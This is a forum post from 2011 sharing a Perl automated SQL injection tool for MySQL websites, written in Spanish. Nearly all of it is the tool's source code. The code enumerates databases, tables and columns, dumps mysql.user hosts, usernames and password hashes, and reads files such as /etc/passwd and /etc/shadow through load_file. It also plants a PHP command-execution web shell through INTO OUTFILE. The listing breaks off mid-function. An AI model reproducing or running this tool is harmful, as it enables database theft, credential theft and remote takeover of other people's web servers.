[Perl] K0bra 1.5

BigBear · 1 Diciembre 2011, 22:14 PM

La nueva version de mi scanner SQLi

Las funciones son las siguientes

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile
Todo se guarda en logs ordenados

Código (perl) [Seleccionar] Expandir
#!usr/bin/perl #k0bra 1.5 #Console version #Automatic SQL Scanner for MYSQL #(c)0ded By Doddy H system('cls'); system ("title k0bra"); my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'); use LWP::UserAgent; use URI::Split qw(uri_split); installer(); my $nave = LWP::UserAgent->new(); $nave->timeout(5); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); &head; unless(@ARGV == 2) { &menu; } else { &scan($ARGV[0],$ARVG[1]); } &finish; sub menu { print "[Page] : "; chomp(my $page=<STDIN>); print "\n[Bypass : -- /* %20] : "; chomp(my $bypass = <STDIN>); print "\n\n"; &scan($page,$bypass); } sub scan { my $page = $_[0]; print "[Status] : Scanning.....\n"; ($pass1,$bypass2) = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { motor($page,$_[1]); } else { print "\n[-] Not vulnerable\n\n"; print "[+] Scan anyway y/n : "; chomp(my $op = <stdin>); if ($op eq "y") { motor($page,$_[1]); } else { head(); menu(); } } } sub motor { my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; <STDIN>; &head; &menu; } } sub head { system 'cls'; print qq( @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ ); } sub length { print "\n[+] Looking for the number of columns\n\n"; my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); $total=~s/$number[0]/hackman/; savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); } } } sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[load_file] : ON\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; } } } sub menu_options { head(); print "[Target confirmed] : $_[0]\n"; print "[Bypass] : $_[1]\n\n"; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "[save] : /logs/webs/$save\n\n"; print "\n--== information_schema.tables ==--\n\n"; print "[1] : Show tables\n"; print "[2] : Show columns\n"; print "[3] : Show DBS\n"; print "[4] : Show tables with other DB\n"; print "[5] : Show columns with other DB\n"; print "\n\n--== mysql.user ==--\n\n"; print "[6] : Show users\n"; print "\n--== Others ==--\n\n"; print "[7] : Fuzzing files with load_file\n"; print "[8] : Read a file with load_file\n"; print "[9] : Dump\n"; print "[10] : Informacion of the server\n"; print "[11] : Create a shell with into outfile\n"; print "[12] : Show Log\n"; print "[13] : Change Target\n"; print "[14] : Exit\n"; print "\n\n[Option] : "; chomp(my $opcion = <STDIN>); if ($opcion eq "1") { schematables($_[0],$_[1],$save); &reload; } elsif ($opcion eq "2") { print "\n\n[Table] : "; chomp(my $tabla = <STDIN>); schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($opcion eq "3") { &schemadb($_[0],$_[1],$save); &reload; } elsif ($opcion eq "4") { print "\n\n[DAtabase] : "; chomp(my $data =<STDIN>); &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($opcion eq "5"){ print "\n\n[DB] : "; chomp(my $db =<STDIN>); print "\n[Table] : "; chomp(my $table =<STDIN>); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($opcion eq "6") { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($opcion eq "7") { &load($_[0],$_[1],$save); &reload; } elsif ($opcion eq "8") { ######################################## &loadfile($_[0],$_[1],$save); &reload; } elsif ($opcion eq "9") { print "\n\n[Table to dump] : "; chomp(my $tabla = <STDIN>); print "\n[Column 1] : "; chomp(my $col1 = <STDIN>); print "\n[Column 2] : "; chomp(my $col2 = <STDIN>); print "\n\n"; &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($opcion eq "10") { print "\n\n"; &details($_[0],$_[1],$save); &reload; } elsif ($opcion eq "11") { print "\n\n[Full Path Discloure] : "; chomp(my $path = <STDIN>); &into($_[0],$_[1],$path,$save); &reload; } elsif ($opcion eq "12") { $t = "logs/webs/$save.txt"; system("start $t"); &reload; } elsif ($opcion eq "13") { &head; &menu; } elsif ($opcion eq "14") { &finish; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); print "\n"; my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; chomp $table; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { print "\n\n[+] Finish\n\n"; <STDIN>; &head; &menu_options; } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); print "\n"; ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; chomp $si; $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; chomp $table; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; chomp $si; $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n"; } } sub tabfuzz { my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $count = "0"; savefile($_[2].".txt","\n"); print "\n"; if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] Searching tables.....\n\n"; for my $table(@buscar2) { chomp $table; $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2; $code = toma($injection); if ($code =~/ERTOR854/g) { $count++; print "[Table Found] : $table\n"; savefile($_[2].".txt","[Table Found] : $table"); }}} if ($count eq "0") { print "[-] Not found any table\n"; &reload; } } sub colfuzz { my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $count = "0"; savefile($_[3].".txt","\n"); print "\n"; if ($_[0] =~/(.*)hackman(.*)/) { my $start = $1; my $end = $2; print "[+] Searching columns for the table $_[2]...\n\n"; savefile($_[3].".txt","[Table] : $_[2]"); for my $columns(@buscar1) { chomp $columns; $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))"; $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2); if ($code =~/ERTOR854/g) { print "[Column] : $columns\n"; savefile($_[3].".txt","[Column Found] : $columns"); } } } else { print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright; } } sub load { savefile($_[2].".txt","\n"); print "\n"; ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { print "\n[+] Searching files with load_file...\n\n\n"; my $start = $1; my $end = $2; for my $file(@files) { chomp $file; $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); chomp $code; if ($code=~/k0bra(.*)k0bra/s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print $1; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }}}} sub loadfile { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] File to read : "; chomp (my $file = <stdin>); $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); chomp $code; if ($code=~/k0bra(.*)k0bra/s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print $1; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }}} sub dump { savefile($_[5].".txt","\n"); print "\n"; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { chomp $limit; $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n"; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub into { print "\n\n[Status] : Injecting a SQLI for create a shell\n\n"; my ($page,$bypass,$dir,$save) = @_; savefile($save.".txt","\n"); print "\n"; ($pass1,$pass2) = &bypass($bypass); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $path1 = $1; my $path2 = $path1; $path2 =~s/$1//; $dir =~s/$path1//ig; $shell = $dir."/"."shell.php"; if ($page =~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2); $code1 = toma("http://".$auth."/".$path2."/"."shell.php"); if ($code1=~/Mini Shell By Doddy/ig) { print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a"; savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php"); } else { print "[shell] : Not Found\n"; } } } } sub encode { my $string = $_[0]; $hex = '0x'; for (split //,$string) { $hex .= sprintf "%x", ord; } return $hex; } sub decode { $_[0] =~ s/^0x//; $encode = join q[], map { chr hex } $_[0] =~ /../g; return $encode; } sub bypass { if ($_[0] eq "/*") { return ("/**/","/**/"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } else {return ("+","--");}} sub ascii { return join 